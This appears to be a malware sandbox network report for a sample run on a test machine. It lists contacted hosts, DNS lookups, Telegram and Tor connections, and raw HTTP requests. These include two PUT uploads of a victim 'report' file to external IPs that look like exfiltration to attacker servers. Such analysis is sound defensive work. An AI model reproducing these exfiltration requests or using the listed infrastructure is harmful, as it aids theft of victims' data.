Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 104.76.70.102 | Active | Moloch |
| 129.151.210.129 | Active | Moloch |
| 138.201.197.74 | Active | Moloch |
| 149.154.167.220 | Active | Moloch |
| 159.69.63.226 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 167.86.115.218 | Active | Moloch |
| 185.189.159.121 | Active | Moloch |
| 208.95.112.1 | Active | Moloch |
| 5.181.12.94 | Active | Moloch |
| 61.111.58.40 | Active | Moloch |
| 65.21.49.163 | Active | Moloch |
| 89.46.80.136 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| x1.i.lencr.org | 104.76.70.102 | |
| apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.67.53.19 |
| r3.i.lencr.org | 104.76.70.102 | |
| api.telegram.org | 149.154.167.220 | |
| archive.torproject.org | 159.69.63.226 | |
| ip-api.com | 208.95.112.1 |
- TCP Requests
-
-
192.168.56.103:49179 104.76.70.102:80r3.i.lencr.org
-
192.168.56.103:49180 104.76.70.102:80r3.i.lencr.org
-
192.168.56.103:49175 129.151.210.129:8082
-
192.168.56.103:49185 129.151.210.129:8082
-
192.168.56.103:49181 138.201.197.74:8080
-
192.168.56.103:49182 149.154.167.220:443api.telegram.org
-
192.168.56.103:49170 159.69.63.226:443archive.torproject.org
-
192.168.56.103:49171 208.95.112.1:80ip-api.com
-
192.168.56.103:49177 5.181.12.94:80
-
192.168.56.103:49172 61.111.58.40:80apps.identrust.com
-
192.168.56.103:49178 89.46.80.136:443
-
- UDP Requests
-
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:56613 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:49154 239.255.255.250:1900
-
GET
200
http://ip-api.com/line?fields=query,country
REQUEST
RESPONSE
BODY
GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 08 Jun 2023 00:17:40 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 28
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT
ETag: "37d-5f433188daa00"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Thu, 08 Jun 2023 01:17:55 GMT
Date: Thu, 08 Jun 2023 00:17:55 GMT
Connection: keep-alive
Server-Timing: ak_p; desc="1686183475709_1030699556_119142900_9_877_7_0_-";dur=1
PUT
100
http://5.181.12.94/FMARE_test22%40TEST22-PC_report.wsr
REQUEST
RESPONSE
BODY
PUT /FMARE_test22%40TEST22-PC_report.wsr HTTP/1.1
Host: 5.181.12.94
Content-Length: 133738
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
GET
200
http://r3.i.lencr.org/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: r3.i.lencr.org
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Sat, 13 Feb 2021 01:07:28 GMT
ETag: "60272650-51a"
Unused62: 8096267
Cache-Control: max-age=3600
Expires: Thu, 08 Jun 2023 01:18:38 GMT
Date: Thu, 08 Jun 2023 00:18:38 GMT
Content-Length: 1306
Connection: keep-alive
GET
200
http://x1.i.lencr.org/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: x1.i.lencr.org
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Fri, 19 Jan 2018 23:38:04 GMT
ETag: "5a62815c-56f"
Content-Disposition: attachment; filename="ISRG Root X1.der"
Cache-Control: max-age=53333
Expires: Thu, 08 Jun 2023 15:07:31 GMT
Date: Thu, 08 Jun 2023 00:18:38 GMT
Content-Length: 1391
Connection: keep-alive
PUT
100
http://138.201.197.74:8080/FMARE_test22%40TEST22-PC_report.wsr
REQUEST
RESPONSE
BODY
PUT /FMARE_test22%40TEST22-PC_report.wsr HTTP/1.1
Host: 138.201.197.74:8080
Content-Length: 133738
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.2 192.168.56.103:49170 159.69.63.226:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=archive.torproject.org | 46:76:9d:7a:fb:c3:cf:f3:94:13:39:40:2e:98:0c:2a:7a:3a:ff:f1 |
|
TLS 1.2 192.168.56.103:49178 89.46.80.136:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=transfer.fragnet.gg | 14:fc:1d:17:5c:4b:36:16:b0:e2:f4:bc:bb:3f:64:68:ee:dc:39:ab |
Snort Alerts
No Snort Alerts